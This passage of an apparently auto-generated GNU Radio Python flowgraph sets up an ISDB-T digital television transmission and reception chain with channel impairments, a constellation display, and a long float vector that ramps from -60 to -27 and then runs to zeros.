1 #number of inputs
)
self.qtgui_const_sink_x_0_0.set_update_time(0.10)
self.qtgui_const_sink_x_0_0.set_y_axis(-2, 2)
self.qtgui_const_sink_x_0_0.set_x_axis(-2, 2)
self.qtgui_const_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, qtgui.TRIG_SLOPE_POS, 0.0, 0, "")
self.qtgui_const_sink_x_0_0.enable_autoscale(False)
self.qtgui_const_sink_x_0_0.enable_grid(True)
self.qtgui_const_sink_x_0_0.enable_axis_labels(True)
if not True:
self.qtgui_const_sink_x_0_0.disable_legend()
labels = ['', '', '', '', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "red", "red", "red",
"red", "red", "red", "red", "red"]
styles = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
markers = [0, 0, 0, 0, 0,
0, 0, 0, 0, 0]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(1):
if len(labels[i]) == 0:
self.qtgui_const_sink_x_0_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_const_sink_x_0_0.set_line_label(i, labels[i])
self.qtgui_const_sink_x_0_0.set_line_width(i, widths[i])
self.qtgui_const_sink_x_0_0.set_line_color(i, colors[i])
self.qtgui_const_sink_x_0_0.set_line_style(i, styles[i])
self.qtgui_const_sink_x_0_0.set_line_marker(i, markers[i])
self.qtgui_const_sink_x_0_0.set_line_alpha(i, alphas[i])
self._qtgui_const_sink_x_0_0_win = sip.wrapinstance(self.qtgui_const_sink_x_0_0.pyqwidget(), Qt.QWidget)
self.tab_grid_layout_0.addWidget(self._qtgui_const_sink_x_0_0_win, 7, 0, 2, 1)
for r in range(7, 9):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 1):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self.mer_probe_mer_c_0_0_0 = mer.probe_mer_c((symbol_table_64QAM),0.05)
self.low_pass_filter_0_0 = filter.fir_filter_ccf(1, firdes.low_pass(
1, samp_rate, 5.8e6/2.0, 0.5e6, firdes.WIN_HAMMING, 6.76))
self.isdbt_tmcc_encoder_0 = isdbt.tmcc_encoder(3, True, 4, 64, 4, 1, 2, 0, length_a, length_b, 0, segments_a, segments_b, 0)
self.isdbt_time_interleaver_0 = isdbt.time_interleaver(3, segments_a, length_a, segments_b, length_b, segments_c, length_c)
self.isdbt_subset_of_carriers_0_0 = isdbt.subset_of_carriers(96*4*13, 96*4*1, 13*96*4-1)
self.isdbt_pilot_signals_0 = isdbt.pilot_signals(3)
self.isdbt_isdbt_rf_channel_decoding_0_0 = isdbt.isdbt_rf_channel_decoding(
max_freq_offset=31,
guard=0.0625,
mode=3,
snr=10,
tmcc_print=False,
)
self.isdbt_hierarchical_combinator_0 = isdbt.hierarchical_combinator(3, segments_a, segments_b, 0)
self.isdbt_frequency_interleaver_0 = isdbt.frequency_interleaver(True, 3)
self.isdbt_energy_dispersal_0_0 = isdbt.energy_dispersal(3, 64, 2, segments_b)
self.isdbt_energy_dispersal_0 = isdbt.energy_dispersal(3, 4, 1, segments_a)
self.isdbt_carrier_modulation_0_0 = isdbt.carrier_modulation(3, segments_b, 64)
self.isdbt_carrier_modulation_0 = isdbt.carrier_modulation(3, segments_a, 4)
self.isdbt_byte_interleaver_0_0 = isdbt.byte_interleaver(3, 64, 2, segments_b)
self.isdbt_byte_interleaver_0 = isdbt.byte_interleaver(3, 4, 1, segments_a)
self.fft_vxx_1 = fft.fft_vcc(total_carriers, False, (window.rectangular(total_carriers)), True, 1)
self.fft_vxx_0 = fft.fft_vcc(4096, True, (window.flattop(4096)), True, 1)
self.dtv_dvbt_reed_solomon_enc_0_0 = dtv.dvbt_reed_solomon_enc(2, 8, 0x11d, 255, 239, 8, 51, 1)
self.dtv_dvbt_reed_solomon_enc_0 = dtv.dvbt_reed_solomon_enc(2, 8, 0x11d, 255, 239, 8, 51, 1)
self.dtv_dvbt_inner_coder_0_0_0 = dtv.dvbt_inner_coder(1, 1512*4, dtv.MOD_64QAM, dtv.ALPHA4, dtv.C3_4)
self.dtv_dvbt_inner_coder_0_0 = dtv.dvbt_inner_coder(1, 1512*4, dtv.MOD_QPSK, dtv.ALPHA4, dtv.C2_3)
self.digital_ofdm_cyclic_prefixer_0 = digital.ofdm_cyclic_prefixer(total_carriers, total_carriers+int(total_carriers*guard), 0, '')
self.channels_impairments_0 = channels.impairments(phase_noise, IQ_Mag_Imbalance, IQ_Phase_Imbalance, Quad_Offset, Infase_Offset, frec_offset, SOI, TOI)
self.channels_channel_model_0 = channels.channel_model(
noise_voltage=noise_volt,
frequency_offset=frec_offset,
epsilon=1,
taps=(taps),
noise_seed=0,
block_tags=False
)
self.blocks_vector_to_stream_0_2_0 = blocks.vector_to_stream(gr.sizeof_gr_complex*1, 96*4*12)
self.blocks_vector_to_stream_0_1_0 = blocks.vector_to_stream(gr.sizeof_char*1, 1512*4)
self.blocks_vector_to_stream_0_1 = blocks.vector_to_stream(gr.sizeof_char*1, 1512*4)
self.blocks_vector_source_x_0_0_0 = blocks.vector_source_f((-60.0,-59.9,-59.9,-59.8,-59.8,-59.7,-59.6,-59.6,-59.5,-59.5,-59.4,-59.3,-59.3,-59.2,-59.2,-59.1,-59.0,-59.0,-58.9,-58.9,-58.8,-58.7,-58.7,-58.6,-58.6,-58.5,-58.4,-58.4,-58.3,-58.3,-58.2,-58.1,-58.1,-58.0,-58.0,-57.9,-57.8,-57.8,-57.7,-57.7,-57.6,-57.5,-57.5,-57.4,-57.4,-57.3,-57.2,-57.2,-57.1,-57.1,-57.0,-56.9,-56.9,-56.8,-56.8,-56.7,-56.6,-56.6,-56.5,-56.5,-56.4,-56.3,-56.3,-56.2,-56.2,-56.1,-56.0,-56.0,-55.9,-55.9,-55.8,-55.7,-55.7,-55.6,-55.6,-55.5,-55.4,-55.4,-55.3,-55.3,-55.2,-55.1,-55.1,-55.0,-55.0,-54.9,-54.8,-54.8,-54.7,-54.7,-54.6,-54.5,-54.5,-54.4,-54.3,-54.3,-54.2,-54.2,-54.1,-54.0,-54.0,-53.9,-53.9,-53.8,-53.7,-53.7,-53.6,-53.6,-53.5,-53.4,-53.4,-53.3,-53.3,-53.2,-53.1,-53.1,-53.0,-53.0,-52.9,-52.8,-52.8,-52.7,-52.7,-52.6,-52.5,-52.5,-52.4,-52.4,-52.3,-52.2,-52.2,-52.1,-52.1,-52.0,-51.9,-51.9,-51.8,-51.8,-51.7,-51.6,-51.6,-51.5,-51.5,-51.4,-51.3,-51.3,-51.2,-51.2,-51.1,-51.0,-51.0,-50.9,-50.9,-50.8,-50.7,-50.7,-50.6,-50.6,-50.5,-50.4,-50.4,-50.3,-50.3,-50.2,-50.1,-50.1,-50.0,-50.0,-49.9,-49.8,-49.8,-49.7,-49.7,-49.6,-49.5,-49.5,-49.4,-49.4,-49.3,-49.2,-49.2,-49.1,-49.1,-49.0,-48.9,-48.9,-48.8,-48.8,-48.7,-48.6,-48.6,-48.5,-48.5,-48.4,-48.3,-48.3,-48.2,-48.2,-48.1,-48.0,-48.0,-47.9,-47.9,-47.8,-47.7,-47.7,-47.6,-47.6,-47.5,-47.4,-47.4,-47.3,-47.3,-47.2,-47.1,-47.1,-47.0,-47.0,-46.9,-46.8,-46.8,-46.7,-46.7,-46.6,-46.5,-46.5,-46.4,-46.4,-46.3,-46.2,-46.2,-46.1,-46.1,-46.0,-45.9,-45.9,-45.8,-45.8,-45.7,-45.6,-45.6,-45.5,-45.5,-45.4,-45.3,-45.3,-45.2,-45.2,-45.1,-45.0,-45.0,-44.9,-44.9,-44.8,-44.7,-44.7,-44.6,-44.6,-44.5,-44.4,-44.4,-44.3,-44.3,-44.2,-44.1,-44.1,-44.0,-44.0,-43.9,-43.8,-43.8,-43.7,-43.7,-43.6,-43.5,-43.5,-43.4,-43.3,-43.3,-43.2,-43.2,-43.1,-43.0,-43.0,-42.9,-42.9,-42.8,-42.7,-42.7,-42.6,-42.6,-42.5,-42.4,-42.4,-42.3,-42.3,-42.2,-42.1,-42.1,-42.0,-42.0,-41.9,-41.8,-41.8,-41.7,-41.7,-41.6,-41.5,-41.5,-41.4,-41.4,-41.3,-41.2,-41.2,-41.1,-41.1,-41.0,-40.9,-40.9,-40.8,-40.8,-40.7,-40.6,-4
0.6,-40.5,-40.5,-40.4,-40.3,-40.3,-40.2,-40.2,-40.1,-40.0,-40.0,-39.9,-39.9,-39.8,-39.7,-39.7,-39.6,-39.6,-39.5,-39.4,-39.4,-39.3,-39.3,-39.2,-39.1,-39.1,-39.0,-39.0,-38.9,-38.8,-38.8,-38.7,-38.7,-38.6,-38.5,-38.5,-38.4,-38.4,-38.3,-38.2,-38.2,-38.1,-38.1,-38.0,-37.9,-37.9,-37.8,-37.8,-37.7,-37.6,-37.6,-37.5,-37.5,-37.4,-37.3,-37.3,-37.2,-37.2,-37.1,-37.0,-37.0,-36.9,-36.9,-36.8,-36.7,-36.7,-36.6,-36.6,-36.5,-36.4,-36.4,-36.3,-36.3,-36.2,-36.1,-36.1,-36.0,-36.0,-35.9,-35.8,-35.8,-35.7,-35.7,-35.6,-35.5,-35.5,-35.4,-35.4,-35.3,-35.2,-35.2,-35.1,-35.1,-35.0,-34.9,-34.9,-34.8,-34.8,-34.7,-34.6,-34.6,-34.5,-34.5,-34.4,-34.3,-34.3,-34.2,-34.2,-34.1,-34.0,-34.0,-33.9,-33.9,-33.8,-33.7,-33.7,-33.6,-33.6,-33.5,-33.4,-33.4,-33.3,-33.3,-33.2,-33.1,-33.1,-33.0,-33.0,-32.9,-32.8,-32.8,-32.7,-32.7,-32.6,-32.5,-32.5,-32.4,-32.3,-32.3,-32.2,-32.2,-32.1,-32.0,-32.0,-31.9,-31.9,-31.8,-31.7,-31.7,-31.6,-31.6,-31.5,-31.4,-31.4,-31.3,-31.3,-31.2,-31.1,-31.1,-31.0,-31.0,-30.9,-30.8,-30.8,-30.7,-30.7,-30.6,-30.5,-30.5,-30.4,-30.4,-30.3,-30.2,-30.2,-30.1,-30.1,-30.0,-29.9,-29.9,-29.8,-29.8,-29.7,-29.6,-29.6,-29.5,-29.5,-29.4,-29.3,-29.3,-29.2,-29.2,-29.1,-29.0,-29.0,-28.9,-28.9,-28.8,-28.7,-28.7,-28.6,-28.6,-28.5,-28.4,-28.4,-28.3,-28.3,-28.2,-28.1,-28.1,-28.0,-28.0,-27.9,-27.8,-27.8,-27.7,-27.7,-27.6,-27.5,-27.5,-27.4,-27.4,-27.3,-27.2,-27.2,-27.1,-27.1,-27.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0